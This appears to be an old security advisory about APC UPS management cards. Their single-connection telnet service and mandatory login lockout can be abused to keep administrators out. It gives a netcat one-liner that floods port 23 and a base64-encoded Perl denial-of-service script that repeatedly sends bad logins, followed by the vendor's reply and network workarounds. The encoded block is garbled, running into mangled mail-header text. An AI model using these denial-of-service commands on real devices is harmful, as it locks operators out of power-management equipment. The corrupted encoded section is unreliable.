Vulnerability APC Affected APC web/snmp/telnet management Description 'altomo' found following. Some APC products such as the symetra offer the option of adding a management card to allow an admin the ablilty to setup monitoring and notification. The card is accessable by snmp, web interface, and telnet. Itseems that only one telnet connection is allowed at a time.(problem 1). The telnet sesssion is authenticated by a user/password method, if the incorrect combination is entered 3 times no connections are allowed for the defined lockout time. Min. 1 minute, max 10 minutes. (problem 2) Problem 1 ========= Since only one connection is allowed to the telnet port an admin could be kept from connecting. Easy to reproduce. cat /dev/zero | nc ip-here 23 (ya ya dirty) Problem 2 ========= Lock out period. Lock out periods are a good thing, we really do like them. But when no one can connect its a bad thing. Since the lockout period can not be set to 0 an attacker could take advantage of this by sending 3 incorrect login attempts to the unit and repeat every 60 secs using the minimal lockout time. Even if the admin has lockout set to 10 minutes it will keep repeating and work when it actually is enabled again. Both of these are easy to reproduce. DoS Code: --- Content-Type: application/octet-stream; name="apcdos.pl" Content-Transfer-Encoding: base64 Content-Disposition: inline; filename="apcdos.pl" Content-MD5: F3KB1oBnhiW8zWzz9gvdVQ== IyEvdXNyL2Jpbi9wZXJsCiNhbHRvbW9AbnVkZWhhY2tlcnMuY29tCiNhcGMgbWFuYWdlbWVu dCBjYXJkIGRvcwoKJHVzZXIgPSAiYmxhY2tzdW4iOwokdGltZSA9ICIkQVJHVlsxXSI7Cgp1 c2UgSU86OlNvY2tldDsKJGlwID0gIiRBUkdWWzBdIjsKJHBvcnQgPSAiMjMiOwppZiAoJCNB UkdWPDApIHsKcHJpbnQgIiB1c2VhZ2U6ICQwIDxob3N0bmFtZT4gPGRlbGF5IGluIHNlY29u ZHM+XG4iOwpleGl0KCk7Cn0KJHNvY2tldCA9IElPOjpTb2NrZXQ6OklORVQtPm5ldygKUHJv dG89PiJ0Y3AiLApQZWVyQWRkcj0+JGlwLApQZWVyUG9ydD0+JHBvcnQsKTsKCgpwcmludCAi QXBjIG1hbmFnZW1lbnQgY2FyZCBEb1NcbiI7CnByaW50ICJhbHRvbW9cQG51ZGVoYWNrZXJz LmNvbVxuIjsKCgpzdWIgZG9zKCkgewpwcmludCAiRG9TIHN0YXJ0ZWQgd2lsbCBhdHRhY2sg ZXZlcnkgJHRpbWUgc2Vjb25kc1xuIjsKcHJpbnQgIkN0cmwrQyB0byBleGl0XG4iOwpwcmlu dCAkc29ja2V0ICIkdXNlclxyIjsKcHJpbnQgJHNvY2tldCAiJHVzZXJcciI7CnByaW50ICRz b2NrZXQgIiR1c2VyXHIiOwpwcmludCAkc29ja2V0ICIkdXNlclxyIjsKcHJpbnQgJHNvY2tl dCAiJHVzZXJcciI7CnByaW50ICRzb2NrZXQgIiR1c2VyXHIiOwpwcmludCAiXG4iOwpjbG9z ZSAkc29ja2V0OwpzbGVlcCgkdGltZSk7ICAgICAgICAgIAomZG9zOwoKfQomZG9zOwojaG9u ZyBrb25nIGRhbmdlciBkdW8KFromownerbugtraqSECURITYFOCUSCOMTueFeb2720540720 01Receivedfromlistssecurityfocuscomlistssecurityfocuscom66381517byoliver efrihr893/893withESMTPidUAA10199forcrvEFRIHRTue27Feb2001205405+0100METRe ceivedfromlistssecurityfocuscomlistssecurityfocuscom66381517bylistssecur ityfocuscomPostfixwithESMTPid56E6424D012Tue27Feb20011213430700MSTReceive dfromLISTSSECURITYFOCUSCOMbyLISTSSECURITYFOCUSCOMLISTSERVTCP/IPrelease18 dwithspoolid27190053forBUGTRAQLISTSSECURITYFOCUSCOMTue27Feb2001121255070 0ApprovedBybengSECURITYFOCUSCOMDeliveredTobugtraqlistssecurityfocuscomRe ceivedfromsecurityfocuscommailsecurityfocuscom66381519bylistssecurityfoc uscomPostfixwithSMTPidE76A524E12AforbugtraqlistssecurityfocuscomMon26Feb 20011535370700MSTReceivedqmail21247invokedbyalias26Feb20012235530000Deli veredToBUGTRAQSECURITYFOCUSCOMReceivedqmail21240invokedfromnetwork26Feb2 0012235530000Receivedfrom2464145133onwavehomecomHELOKWANca2464145133byma ilsecurityfocuscomwithSMTP26Feb20012235530000Receivedfromlocalhostdkwanl ocalhostbyKWANca8111/893withESMTPidf1QMbJQ15118Mon26Feb20011737190500MIM EVersion10ContentTypeTEXT/PLAINcharseg== ----- Solution Author contacted APC via email and informed they of what had been found and asked if this was going to be addressed in the future. The response received back was: "At this time the security on the web card is at its highest level. The only other suggestion is to make changes on the firewall." APC's responds is kinda true. Why would you want to have the telnet port to your UPS open wide up to the world. These UPS IP's should sit behind your DMZ and treat them as a internal servers. Or atleast they should be on a private subnet, and Admin have to logon to a box and hop over to the UPS private subnet. BUT what about internal attackers? There are 2 ghetto style work arounds of course. 1. leave web or snmp open to managed this product 2. put on a private network and have a linux box infront ssh to linux box then telnet to apc.